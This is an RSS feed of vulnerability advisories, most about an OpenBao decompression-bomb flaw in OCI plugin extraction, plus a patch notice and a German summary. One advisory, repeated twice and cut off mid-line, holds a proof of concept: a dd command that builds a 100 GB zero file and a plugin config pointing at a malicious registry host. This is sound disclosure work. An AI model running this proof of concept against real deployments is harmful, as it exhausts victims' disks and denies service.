<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" version="2.0">
  <channel>
    <title>Most recent entries from all</title>
    <link>https://cve.radiocsirt.org</link>
    <description>Contains only the most 10 recent entries.</description>
    <docs>http://www.rssboard.org/rss-specification</docs>
    <generator>python-feedgen</generator>
    <language>en</language>
    <lastBuildDate>Fri, 02 Oct 2026 17:16:30 +0000</lastBuildDate>
    <item>
      <title>bdu:2026-08728</title>
      <link>https://cve.radiocsirt.org/vuln/bdu:2026-08728</link>
      <description>bdu:2026-08728</description>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/bdu:2026-08728</guid>
    </item>
    <item>
      <title>BIT-openbao-2026-39396 — OpenBao has Decompression Bomb via Unbounded Copy in OCI Plugin Extraction (DoS)</title>
      <link>https://cve.radiocsirt.org/vuln/bit-openbao-2026-39396</link>
      <description>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; Bitnami: openbao&lt;/p&gt;
&lt;p&gt;OpenBao is an open source identity-based secrets management system. Prior to version 2.5.3, `ExtractPluginFromImage()` in OpenBao&amp;#39;s OCI plugin downloader extracts a plugin binary from a container image by streaming decompressed tar data via `io.Copy` with no upper bound on the number of bytes written. An attacker who controls or compromises the OCI registry referenced in the victim&amp;#39;s configuration can serve a crafted image containing a decompression bomb that decompresses to an arbitrarily large file. The SHA256 integrity check occurs after the full file is written to disk, meaning the hash mismatch is detected only after the damage (disk exhaustion) has already occurred. This allow the attacker to replace **legit plugin image** with no need to change its signature. Version 2.5.3 contains a patch.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; Bitnami: openbao&lt;/p&gt;
&lt;p&gt;OpenBao is an open source identity-based secrets management system. Prior to version 2.5.3, `ExtractPluginFromImage()` in OpenBao&amp;#39;s OCI plugin downloader extracts a plugin binary from a container image by streaming decompressed tar data via `io.Copy` with no upper bound on the number of bytes written. An attacker who controls or compromises the OCI registry referenced in the victim&amp;#39;s configuration can serve a crafted image containing a decompression bomb that decompresses to an arbitrarily large file. The SHA256 integrity check occurs after the full file is written to disk, meaning the hash mismatch is detected only after the damage (disk exhaustion) has already occurred. This allow the attacker to replace **legit plugin image** with no need to change its signature. Version 2.5.3 contains a patch.&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/bit-openbao-2026-39396</guid>
    </item>
    <item>
      <title>EUVD-2026-292283</title>
      <link>https://cve.radiocsirt.org/vuln/euvd-2026-292283</link>
      <description>EUVD-2026-292283</description>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/euvd-2026-292283</guid>
    </item>
    <item>
      <title>fkie_cve-2026-39396</title>
      <link>https://cve.radiocsirt.org/vuln/fkie_cve-2026-39396</link>
      <description>&lt;p&gt;OpenBao is an open source identity-based secrets management system. Prior to version 2.5.3, `ExtractPluginFromImage()` in OpenBao&amp;#39;s OCI plugin downloader extracts a plugin binary from a container image by streaming decompressed tar data via `io.Copy` with no upper bound on the number of bytes written. An attacker who controls or compromises the OCI registry referenced in the victim&amp;#39;s configuration can serve a crafted image containing a decompression bomb that decompresses to an arbitrarily large file. The SHA256 integrity check occurs after the full file is written to disk, meaning the hash mismatch is detected only after the damage (disk exhaustion) has already occurred. This allow the attacker to replace **legit plugin image** with no need to change its signature. Version 2.5.3 contains a patch.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;OpenBao is an open source identity-based secrets management system. Prior to version 2.5.3, `ExtractPluginFromImage()` in OpenBao&amp;#39;s OCI plugin downloader extracts a plugin binary from a container image by streaming decompressed tar data via `io.Copy` with no upper bound on the number of bytes written. An attacker who controls or compromises the OCI registry referenced in the victim&amp;#39;s configuration can serve a crafted image containing a decompression bomb that decompresses to an arbitrarily large file. The SHA256 integrity check occurs after the full file is written to disk, meaning the hash mismatch is detected only after the damage (disk exhaustion) has already occurred. This allow the attacker to replace **legit plugin image** with no need to change its signature. Version 2.5.3 contains a patch.&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/fkie_cve-2026-39396</guid>
    </item>
    <item>
      <title>GHSA-r65v-xgwc-g56j — OpenBao: Decompression Bomb via Unbounded Copy in OCI Plugin Extraction (DoS)</title>
      <link>https://cve.radiocsirt.org/vuln/ghsa-r65v-xgwc-g56j</link>
      <description>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; Go: github.com/openbao/openbao&lt;/p&gt;
&lt;p&gt;### Summary&lt;/p&gt;
&lt;p&gt;`ExtractPluginFromImage()` in OpenBao&amp;#39;s OCI plugin downloader extracts a plugin binary from a container image by streaming decompressed tar data via `io.Copy` with no upper bound on the number of bytes written.
An attacker who controls or compromises the OCI registry referenced in the victim&amp;#39;s configuration can serve a crafted image containing a decompression bomb that decompresses to an arbitrarily large file.&lt;/p&gt;
&lt;p&gt;The SHA256 integrity check occurs after the full file is written to disk, meaning the hash mismatch is detected only after the damage (disk exhaustion) has already occurred. This allow the attacker to replace **legit plugin image** with no need to change its signature.&lt;/p&gt;
&lt;p&gt;### Details&lt;/p&gt;
&lt;p&gt;#### Root cause&lt;/p&gt;
&lt;p&gt;`helper/pluginutil/oci/downloader.go:301`:&lt;/p&gt;
&lt;p&gt;```go
if _, copyErr := io.Copy(outFile, tarReader); copyErr != nil {
```&lt;/p&gt;
&lt;p&gt;`io.Copy()` reads until EOF with no size limit.  
The tar `header.Size` field is never validated before the copy, and `mutate.Extract` decompresses all gzip layers in memory/streaming, resulting in unbounded decompression-to-disk.&lt;/p&gt;
&lt;p&gt;### PoC&lt;/p&gt;
&lt;p&gt;1. Set up a malicious OCI registry
2. Create a decompression bomb binary:
   ```bash
   dd if=/dev/zero bs=1G count=100 &amp;gt; /tmp/bomb-binary
   ```
3. Package it in a minimal OCI image
4. Push to the malicious registry
5. Configure victim OpenBao to use this registry:
   ```hcl
   plugin &amp;#34;secrets&amp;#34; &amp;#34;bomb&amp;#34; {
     image       = &amp;#34;evil.example.com/plugin&amp;#34;
     version     = &amp;#34;v1.0.0&amp;#34;
     binary_name = &amp;#34;openbao-plu…&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; Go: github.com/openbao/openbao&lt;/p&gt;
&lt;p&gt;### Summary&lt;/p&gt;
&lt;p&gt;`ExtractPluginFromImage()` in OpenBao&amp;#39;s OCI plugin downloader extracts a plugin binary from a container image by streaming decompressed tar data via `io.Copy` with no upper bound on the number of bytes written.
An attacker who controls or compromises the OCI registry referenced in the victim&amp;#39;s configuration can serve a crafted image containing a decompression bomb that decompresses to an arbitrarily large file.&lt;/p&gt;
&lt;p&gt;The SHA256 integrity check occurs after the full file is written to disk, meaning the hash mismatch is detected only after the damage (disk exhaustion) has already occurred. This allow the attacker to replace **legit plugin image** with no need to change its signature.&lt;/p&gt;
&lt;p&gt;### Details&lt;/p&gt;
&lt;p&gt;#### Root cause&lt;/p&gt;
&lt;p&gt;`helper/pluginutil/oci/downloader.go:301`:&lt;/p&gt;
&lt;p&gt;```go
if _, copyErr := io.Copy(outFile, tarReader); copyErr != nil {
```&lt;/p&gt;
&lt;p&gt;`io.Copy()` reads until EOF with no size limit.  
The tar `header.Size` field is never validated before the copy, and `mutate.Extract` decompresses all gzip layers in memory/streaming, resulting in unbounded decompression-to-disk.&lt;/p&gt;
&lt;p&gt;### PoC&lt;/p&gt;
&lt;p&gt;1. Set up a malicious OCI registry
2. Create a decompression bomb binary:
   ```bash
   dd if=/dev/zero bs=1G count=100 &amp;gt; /tmp/bomb-binary
   ```
3. Package it in a minimal OCI image
4. Push to the malicious registry
5. Configure victim OpenBao to use this registry:
   ```hcl
   plugin &amp;#34;secrets&amp;#34; &amp;#34;bomb&amp;#34; {
     image       = &amp;#34;evil.example.com/plugin&amp;#34;
     version     = &amp;#34;v1.0.0&amp;#34;
     binary_name = &amp;#34;openbao-plu…&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/ghsa-r65v-xgwc-g56j</guid>
    </item>
    <item>
      <title>openSUSE-SU-2026:10594-1 — openbao-2.5.3-1.1 on GA media</title>
      <link>https://cve.radiocsirt.org/vuln/opensuse-su-2026:10594-1</link>
      <description>&lt;p&gt;openbao-2.5.3-1.1 on GA media&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;openbao-2.5.3-1.1 on GA media&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/opensuse-su-2026:10594-1</guid>
    </item>
    <item>
      <title>WID-SEC-W-2026-1189 — OpenBao: Mehrere Schwachstellen</title>
      <link>https://cve.radiocsirt.org/vuln/wid-sec-w-2026-1189</link>
      <description>&lt;p&gt;Ein Angreifer kann mehrere Schwachstellen in OpenBao ausnutzen, um Sicherheitsvorkehrungen zu umgehen, um einen Denial of Service Angriff durchzuführen, und um einen SQL-Injection Angriff durchzuführen.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;Ein Angreifer kann mehrere Schwachstellen in OpenBao ausnutzen, um Sicherheitsvorkehrungen zu umgehen, um einen Denial of Service Angriff durchzuführen, und um einen SQL-Injection Angriff durchzuführen.&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/wid-sec-w-2026-1189</guid>
    </item>
  </channel>
</rss>
